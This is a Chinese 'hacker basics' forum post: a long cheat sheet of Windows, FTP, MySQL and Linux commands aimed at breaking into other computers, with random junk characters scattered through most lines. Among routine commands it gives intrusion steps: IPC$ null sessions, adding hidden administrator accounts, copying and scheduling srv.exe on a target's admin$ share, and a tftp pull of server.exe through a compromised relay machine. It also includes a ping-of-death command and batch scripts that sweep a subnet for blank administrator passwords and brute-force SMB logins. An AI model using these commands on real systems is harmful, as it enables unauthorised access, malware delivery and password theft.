黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 5 K' z4 H2 l. \8 N( S7 S
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 ) M+ }0 o5 p- j$ W$ a
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: % ]$ c- M' X6 ]* l! C4 T* M3 O
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
) p: O% d% G$ d8 Unet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
5 K; q' V1 b+ [" \$ Gnet use h: /del 删除映射对方到本地的为H:的映射 " ]0 K" @1 x& R) [+ n# ^, ]; y
net user 用户名　密码　/add 建立用户
& M  j0 }6 R6 O  b( k5 onet user guest /active:yes 激活guest用户
7 c1 V9 x1 Y# q; U: H+ K; k( V: {% e5 Inet user 查看有哪些用户
  ^* q/ f# A0 L( s. H, Nnet user 帐户名 查看帐户的属性 7 h: `& _! P# j1 c+ z/ W
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
) ]6 x" k+ c$ r" {1 q0 rnet start 查看开启了哪些服务
% r  O' f' y7 Q: P( Z4 N! Nnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
9 d# M5 i$ z' J! ^net stop 服务名 停止某服务
) P9 g" ]9 k. a0 A; A' ~. A) Rnet time \\目标ip 查看对方时间 & X, _1 |+ _6 i8 U1 P5 H
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
. f8 w+ S# L1 O( ^1 v+ g! Mnet view 查看本地局域网内开启了哪些共享
) k! Q$ V* O( A$ Q0 h: ynet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
& z4 V, Z" E& }" [2 t; n# ~# ^- o& p" ]net config 显示系统网络设置
4 A! T& o! K% b/ C1 J! s8 Knet logoff 断开连接的共享
( d* ~- z1 t9 f. T+ G1 E5 Y* X3 Z4 anet pause 服务名 暂停某服务 2 H! C* T8 l: s
net send ip "文本信息" 向对方发信息 ! b" f! t, V9 g1 c% m
net ver 局域网内正在使用的网络连接类型和信息
# c2 ^5 ^, |% U4 ^7 }net share 查看本地开启的共享 . q8 w/ x& }2 ?( K
net share ipc$ 开启ipc$共享
  Y8 X% a% ?: |$ U4 \$ c$ t  ynet share ipc$ /del 删除ipc$共享
" G9 a. i# x. x* f- N# inet share c$ /del 删除C：共享 ; {" q1 h" H( y  [! P+ a0 K
net user guest 12345 用guest用户登陆后用将密码改为12345 / E8 `7 D$ R) k. k) _* ]
net password 密码 更改系统登陆密码
! N3 J& H* H" m! L4 f2 z4 jnetstat -a 查看开启了哪些端口,常用netstat -an
+ D' ]2 U1 n9 ?  jnetstat -n 查看端口的网络连接情况，常用netstat -an
5 G6 h4 X& z9 vnetstat -v 查看正在进行的工作 ! Y' L! c' L0 ]! ^$ n* z1 b
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
6 i; N% A- p0 ^; Z+ g! mnetstat -s 查看正在使用的所有协议使用情况 ( u1 \. U/ E/ F* Y
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 ( }# C5 y+ J& r) C# _7 I
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 : k6 k. H# d/ K8 y1 Y( \  Y
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
1 r9 r' P/ Y: Mping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
9 k8 r7 X( Q) Q2 x2 R; X+ l2 Eipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 " G% m! B! a% y: b0 G2 s/ W
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) - `$ r/ s5 F' P% z. @  G# u2 x8 R
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
4 H5 f0 o; s; sdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 & f+ O' u' }- K$ G4 m3 b& K, q+ D
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
: Y5 q& ~% @# x5 E2 ^- |move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 2 j0 j7 E' k: h6 u# `& z
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
& s% O8 }) {+ u- a/ I+ }at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
' J4 ^" E6 m- S1 d/ H' Lat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 $ P' ]  X; J  |
at id号 /delete 停止某个已注册的计划任务   i9 Y+ G4 @" D# E
at 查看所有的计划任务 ' I4 h2 T4 y0 Z) Z, v. d8 Q
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 & o& z, I4 Z4 Q9 M; L. {7 F
finger username @host 查看最近有哪些用户登陆 5 a  f  X0 f- I- ]" N
telnet ip 端口 远和登陆服务器,默认端口为23 ) Z+ n- h9 }9 X7 E+ H' [
open ip 连接到IP（属telnet登陆后的命令） # ~1 I* S1 P7 l7 R- r
telnet 在本机上直接键入telnet 将进入本机的telnet " y' ?' }/ @7 E  ~! q2 w6 L$ I
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 * T1 T9 r9 O. M4 [  v; d! d
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 ; n' y0 N$ F7 _
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
" z! m3 _+ h9 t: }9 d  qcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
6 s# t# q$ V/ e# Vxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
) d2 A; Z% ^# z: _tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
/ I# D1 Y7 ]+ N% [tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 , B# s8 K5 B7 R0 B
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)   U5 O9 O' H% K2 j# O4 t
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface : b7 G/ g- D# X- R8 C0 ?
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
* h' A" ~& V( ]- I$ i/ k& c. Cstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 * a! [' z: i) O) W
mem 查看cpu使用情况 ! T7 P# x4 u$ g2 t2 Q  B
attrib 文件名(目录名) 查看某文件（目录）的属性
9 E$ m9 c% i1 U- f2 P8 q2 qattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 # L* Z" O0 @" R/ I5 u
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 - T) a% o- }; {  S" E& N
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
' S% V# w. y2 H7 {7 Lset 指定环境变量名称=要指派给变量的字符 设置环境变量
) D9 j& e- \" p0 t* W3 cset 显示当前所有的环境变量
) G# B- b2 O8 W. h! B0 `8 j" yset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
; B4 f3 D* T1 o7 v* z6 l: epause 暂停批处理程序，并显示出：请按任意键继续.... / n% O: v& P7 [0 i# D
if 在批处理程序中执行条件处理（更多说明见if命令及变量） 3 X; s: }1 c; z1 C
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
. X; L! h, _0 y9 p  `call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
; p7 _0 v% X% b; L" N- Jfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
( P* H6 w# G6 J/ o( \echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
8 y* t' c0 `) B- H9 R( Kecho 信息 在屏幕上显示出信息 8 ?+ O  |) d4 B7 q
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
, |' j  f1 f* ^5 U% q9 Jfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello % T$ l) F. ]; v# K4 E4 m+ k
find 文件名 查找某文件
& v* Z1 T; X  Y6 _9 Qtitle 标题名字 更改CMD窗口标题名字 5 S" {5 B9 O& \4 i! c
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
: r- l5 ~; B2 ?; q3 J& [* Lprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
8 ?9 A! ^# g- o3 d( s* o( oprint 文件名 打印文本文件 % t9 A) H3 B- w( S2 e- `
ver 在DOS窗口下显示版本信息
& X0 H" D# |" H: z0 y$ |* Gwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） 2 Z/ g! O$ A' R
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
* B5 r, r7 E+ }7 D+ S1 cmd　目录名 创建目录 0 E) Q' i& q. M) F
replace 源文件　要替换文件的目录 替换文件 7 l  U# o5 |4 G+ @
ren 原文件名　新文件名 重命名文件名 3 m5 y, Y  z2 R4 G" P, M5 O/ l
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 ( ?) L; P6 S* d0 u* r
type 文件名 显示文本文件的内容
# o2 b* i7 O* S( J2 D9 dmore 文件名 逐屏显示输出文件
9 N* j2 ^9 a' q0 `: C, O, Bdoskey 要锁定的命令＝字符
' `; w8 J: }- H0 U$ }& ^doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= - j/ j  ?" I4 `6 c2 Y
taskmgr 调出任务管理器
* F! p2 M4 W6 @' T7 B8 C; Wchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 0 E! P+ x; \6 k* K* @  U
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
: `6 V4 y8 L5 X. m. \8 S0 gexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe / l5 t  r7 e  b1 M6 J7 y( q( r6 S: F8 t
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
$ {3 X/ b% t- E5 tcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? 8 t& q3 H& m& L/ }0 L9 Y; ^% I
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
5 S5 d1 r5 u1 Q' M8 Pregedit /e 注册表文件名 导出注册表
6 R6 u, K( u$ E: y- {6 Ccacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。   k0 i% g$ p* @# z2 C
cacls 文件名 查看文件的访问用户权限列表 # p! A& {7 z1 S- X) H2 @# D% U
REM 文本内容 在批处理文件中添加注解 + J' v& b: a. Q4 t- k9 I
netsh 查看或更改本地网络配置情况( M3 [* Y! e3 E! L9 m1 C( o
IIS服务命令：0 z) [1 ]* v- j5 D
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） ( O" l7 q" G+ }
iisreset /start或stop 启动（停止）所有Internet服务 / K' h: m7 N' i7 |$ N, B
iisreset /restart 停止然后重新启动所有Internet服务
: j! [8 q- h- l9 C1 J8 c# X& |iisreset /status 显示所有Internet服务状态 & I8 ?2 g9 n0 n+ N5 H
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
+ V% V" n2 p+ m1 [iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ) i/ }* m4 ^; i. }) i: S
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 ; z5 P+ \, a5 j: T2 a
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
8 v, S# X/ A3 h$ WFTP 命令： (后面有详细说明内容)
( [' L# i% u0 M% p) E8 Uftp的命令行格式为:
  Z. n! H9 e, x4 \/ g/ R, w9 Mftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
. F, P  K" v0 w& _% a－d 使用调试方式。
0 }" Y! \- b; M( Y" X2 L( ^－n 限制ftp的自动登录,即不使用.netrc文件。
% [6 ~" s' R. u2 O- ]: @－g 取消全局文件名。
; R7 Y2 A" @" w+ a! m' v/ [0 {help [命令] 或 ？[命令] 查看命令说明 & C6 ^: N8 q  @5 {, @# g! `
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 7 }5 ]4 ?* E- n$ h
pwd 列出当前远端主机目录
" R( T6 `* e/ Eput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
9 {" r  Q6 a* J, ^* z% s9 N7 rget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 9 `' i- R* v( B& l
mget [remote-files] 从远端主机接收一批文件至本地主机
+ b' F' q, t( C+ n  P$ w  Qmput local-files 将本地主机中一批文件传送至远端主机   J7 C. R& A! t6 K" }4 K
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
# i3 m3 H/ }, X; Q5 [: g0 O% F1 Y& tascii 设定以ASCII方式传送文件(缺省值)
3 s+ d3 _1 Q6 G* E) ~$ ?" o. s. M; \bin 或 image 设定以二进制方式传送文件
0 k5 U* h2 p' N6 Qbell 每完成一次文件传送,报警提示 , w) p6 o8 \: k
cdup 返回上一级目录 ' f/ d% e8 {3 d0 O1 t$ m" i
close 中断与远程服务器的ftp会话(与open对应) ) R) V& C2 Y7 w' a9 l
open host[port] 建立指定ftp服务器连接,可指定连接端口 9 N# ^* H$ n# r
delete 删除远端主机中的文件 4 @0 [( y1 r: ?; u
mdelete [remote-files] 删除一批文件
( D9 \# u* l5 B( f! L& Xmkdir directory-name 在远端主机中建立目录 9 F  y* v# P; u0 {7 U. \' v, h5 v6 ?
rename [from] [to] 改变远端主机中的文件名 " ]% g, o; Q. R  _* s3 O
rmdir directory-name 删除远端主机中的目录 ) C! d- [- I1 r# p
status 显示当前FTP的状态
7 m* A+ {# y! Ysystem 显示远端主机系统类型 8 P8 L. y# I* X' I
user user-name [password] [account] 重新以别的用户名登录远端主机
2 G2 m2 ^4 s  b; b/ G7 A; yopen host [port] 重新建立一个新的连接
- d' K: F( u# `. J" q! F, B5 Mprompt 交互提示模式
: m& c1 K+ Z$ S7 I  ^8 G+ Imacdef 定义宏命令 6 T8 e/ W4 ?- ]3 @3 @: f, E) T
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 : |& z' L! O0 Y9 @
chmod 改变远端主机的文件权限
% T8 g! v8 a+ P4 ccase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
" ^) R  o0 l& ^cd remote－dir 进入远程主机目录 $ k# |! o  t" {# F! V  x6 |
cdup 进入远程主机目录的父目录 5 L4 G$ e* l, x  J8 G) I! }
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
& v* @0 P! U. c3 {7 E8 U% N7 ]9 OMYSQL 命令： ( P+ {3 e! d/ ^; v
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
0 i$ w' y4 o1 l' h（例：mysql -h110.110.110.110 -Uroot -P123456
3 ?+ e: L6 w5 D9 X注:u与root可以不用加空格，其它也一样）
3 O  `* g% _- B: Z. e* iexit 退出MYSQL
; p# Q) X+ Y) h) emysqladmin -u用户名 -p旧密码 password 新密码 修改密码
0 `2 S, p1 ^2 N  n0 q7 A/ vgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） : K' ^  f1 ~  ~
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。   }+ P4 g" p; c! I4 c8 P. r
use mysql；
- c+ E; B9 p3 Qshow tables; 显示库中的数据表 1 l6 p9 [* J6 A  |' b
describe 表名; 显示数据表的结构 - H0 ~& s" Q7 |5 M$ ?8 E1 H
create database 库名; 建库
% K) Q* m/ ^0 L' c: A0 {# P( Xuse 库名；1 G/ J8 d$ y6 u. X
create table 表名 (字段设定列表)； 建表
& `7 V0 O; q1 R& Z  `0 |" Wdrop database 库名; ) ~! C/ k' V. s  Z' q2 i
drop table 表名； 删库和删表
6 Y( i( {: a  p: L& |& U9 ldelete from 表名; 将表中记录清空 0 o6 i/ u( n/ N, ]0 h4 @5 P
select * from 表名; 显示表中的记录 6 d9 g! r3 s7 l. \; A! K( O, F
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 $ G8 `0 v& F" x7 t4 @' c
win2003系统下新增命令（实用部份）： 9 \( `* c1 ?4 f5 J
shutdown /参数 关闭或重启本地或远程主机。
7 m  b3 |; b$ ]参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
/ N4 O) Y! Z) `+ `% L例：shutdown /r /t 0 立即重启本地主机（无延时）
/ ~- X& d; r1 Y3 Y% a# C1 Ptaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。8 ?- g4 z( F2 U5 J: ~# f  o
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 . a% I" S2 ^, z) X4 U
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
, P0 k; t/ P  c8 ^: p' t3 G- P参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
3 X9 G# ^" a1 i3 [  |1 j) ALinux系统下基本命令： 要区分大小写1 f' v& t' k  k
uname 显示版本信息（同win2K的 ver）
4 X- c4 d) [( n  I2 v; ~dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） , }, k# T; n. E+ X
pwd 查询当前所在的目录位置
# D: j( ]1 P0 @- _( J1 }cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 7 J1 ]5 g! t5 H2 Z8 G% N
cat 文件名 查看文件内容 . f0 K9 P3 a% ?- y
cat >abc.txt 往abc.txt文件中写上内容。 ) i. e' Z0 e3 |6 e, p3 l
more 文件名 以一页一页的方式显示一个文本文件。 8 J. x7 ^1 Z) c# C# {
cp 复制文件 " W7 R/ z8 p! b- I
mv 移动文件 ) i" r" p4 \2 m6 a8 X/ F
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
7 R8 ?9 }0 U7 L# t1 imkdir 目录名 建立目录 . ]$ T1 @+ V+ u7 |2 x2 R/ K
rmdir 删除子目录，目录内没有文档。 ! h( a1 x' a9 d- B* c
chmod 设定档案或目录的存取权限
) b* A( f, h4 E2 i+ Hgrep 在档案中查找字符串 7 H! o; [4 p2 b0 d& n3 c- L* H
diff 档案文件比较
2 n. P$ p$ h% p5 c9 ]4 Efind 档案搜寻
. D( q. B  G8 Z' T% W% q9 c% O4 Xdate 现在的日期、时间
8 J' V) [( b0 N# z  @5 Q* R+ _who 查询目前和你使用同一台机器的人以及Login时间地点 8 [) S4 `! l; D. S
w 查询目前上机者的详细资料
+ ~: _5 S/ C; ?2 mwhoami 查看自己的帐号名称 " H" a* K. A, n9 U  _! a+ h( w
groups 查看某人的Group # U. _6 X) U* g; X+ ^/ S* B+ _
passwd 更改密码
/ ]$ n6 P) n( O" a: Ohistory 查看自己下过的命令 ( T" Y) Q3 s( F
ps 显示进程状态 + H- f; O4 R- C% f
kill 停止某进程 2 ]: S. v4 A+ k; q
gcc 黑客通常用它来编译C语言写的文件
! r! B) Q6 J2 J8 n6 G. xsu 权限转换为指定使用者 1 E* ?9 I  W$ t# ?
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
" ?* `' w4 O  J$ K( Uftp ftp连接上某服务器（同win2K* [# v3 K& Y- ^
附：批处理命令与变量$ J3 g! G: e0 m: m7 y0 B
1：for命令及变量 基本格式： , j8 G2 a. A! l, K, K3 ]
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
; g6 o" c+ G3 C. ?) e' B+ J批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3# y, @; _* Z# S
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}7 q/ U, J! l: S1 ~) R
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开( b$ X* }0 J2 a9 f
command_parameters：为特定命令指定参数或命令行开关% `3 \) h* f2 ]
IN (set)：指在(set)中取值；DO command ：指执行command  l1 c8 \) r7 H( H
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
$ {' i6 q: d; j/ r用法举例：
/ P: @. |+ ?4 w! h; `@echo off 8 L0 c0 i4 ]: X2 j+ G6 m2 o
echo 用法格式：test.bat *.*.* > test.txt , U7 _7 I. @2 M* R* `
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
5 C$ K$ D$ d2 j' x& t' r7 p存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。( {6 }! J( f  ]0 Z4 I
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 . t! @& @1 }1 i
@echo off ' x) |& J' C" ^4 F
echo 用法格式：ok.bat ip * U) u4 ^+ t; l5 @5 `+ Z3 o8 Y- L
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
8 \8 E4 h/ f4 x4 p7 i) L存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
8 `' q# z! i. F0 \( ?# D2：if命令及变量 基本格式： $ L5 v7 c' c" k: m) b$ X* v
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
+ ^. t% D5 M- [/ Z0 x2 Y例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
4 @+ i7 I: s- u' H* C& ^' d' G* d8 |8 r0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
, A) s5 G6 m4 q" hIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
" N; E7 c* I# g) [2 ]例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）   V( e) R7 F. C, @
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。, ?: |& P( \1 R0 D) \) J
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。 * K! v  ~, D0 h) I4 ]8 ^$ Q
IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”